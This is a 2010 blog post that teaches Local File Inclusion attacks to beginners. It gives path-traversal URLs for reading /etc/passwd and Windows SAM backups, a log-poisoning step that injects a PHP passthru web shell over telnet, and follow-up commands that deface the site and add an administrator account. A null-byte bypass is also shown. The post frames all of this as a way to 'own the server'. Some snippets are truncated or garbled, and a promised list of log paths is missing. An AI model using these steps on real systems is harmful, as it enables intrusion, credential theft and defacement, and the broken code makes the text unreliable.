Thursday, 7 October 2010

Local File Inclusion [LFI] tutorial for beginners

Before, I have written an article on remote file inclusion (RFI) and this time, I am writing the article of LFI. So what is LFI? Its similar to RFI except that we are gonna include the file within the server rather than from another server. Sometimes, what happens is, we have allow_url_include setting is set to off on the webserver (On is by default) or there's somekind of filtration to check for things like http:// or www (though we can bypass these things). So in that condition, we may have to use LFI to own the server.

So lets again take example of vulnerable script:

    if (IsSet($_GET['page']))

Here we can see that the script doesn't check for which file to be included and hence, we are free to include any file by changing the 'page' GET variable value.

Lets put a quote at the end of URL and we see a pretty nice error like this:

Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2

Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3

So the script can't find the file profile.php' and hence errors. Now, lets try to include sensitive files that might be present in the webserver.

    Eg:    //boot.ini file in windoze
        http://localhost/test.php?page=../../windows/system32/drivers/etc/hosts        //hosts info file
        http://localhost/test.php?page=../../../../etc/passwd            //on Linux
        http://localhost/test.php?page=../../windows/repair/sam            //backup sam file
        etc. and etc.

    Two ../ shifts the current directory to two level down like cd../.. in command prompt. You may watch the error to find how many such dots you should use. But if you don't know how many such ../ you should use or don't want to waste time on finding how many steps you require, you may put enough such trails like about 10 to view these files like boot.ini or /etc/passwd as after reaching to the root folder like C:\, they can't go down anymore.

So you now know how to include sensitive files on the webserver. Now what if we need shell on the server.
Now, we throw some error to the logs of webserver that contain PHP code:
    <?php passthru($_GET['cmd']); ?> or something similar to this. There are functions like system(), shell_exec(), exec(), etc. offered by PHP for executing system level commands.

The problem on injecting malicious code to log files is that we either need to inject through telnet or using codes. I have seen many sites with the perl codes for the purpose. Search it.
What we do is inject the code to log files of apache such as access.log or apache_error.log or php_error.log or on any other log file. Then we include the same log file in the vulnerable script and then execute system commands.
    In my wampserver, I have:

        http://localhost/test.php?page=../logs/access.log   //for the log with site access infos.

There are various places you might want to watch and I'll be listing them at the end of tutorial.
Here I am gonna use telnet to throw the PHP code as error to the access.log file.

    telnet localhost 80
    GET /<? passthru($_GET['cmd']); ?> HTTP/1.1

Now this is gonna get saved in the file access.log in my webserver and now I include it in the vulnerable script:

    So we do:    http://localhost/test.php?page=../logs/access.log&cmd=dir    //lists the directory
    Now you may do any miserable works by writing cmd=any_system_level_commands like:
        ls -lia
        echo "HaCKeD BY sam207">index.*
        net user sam207 mypass /add
        net localgroup administrator sam207 /add

and any other commands you like.
This describes pretty much on owning the server. Now something extras I thought to include here:
    Some developers think that they can ensure the inclusion of only valid php file by doing something like below:

            if (IsSet($_GET['page']))

        // so looks like that it will include only the php files by ensuring the .php extension at the end. But if we add question mark (?) or nullbyte () by doing http://localhost/test.php?page=access.log, it would become something like:
                include("access.log.php");    //now the scripts leaves anything behind the nullbyte and the file access.log is successfully included. And you can carry your usual pwnage.
        Note that don't try to inject PHP code by sending malicious HTTP requests through your browser. It will be encoded and you won't be able to exploit.

Now finally the places you might want to watch on lfi:
You can find many other places to look after during your lfi by searching on the internet. Be creative and use your brain.
Hope you like it. Please comment it.
With Regards~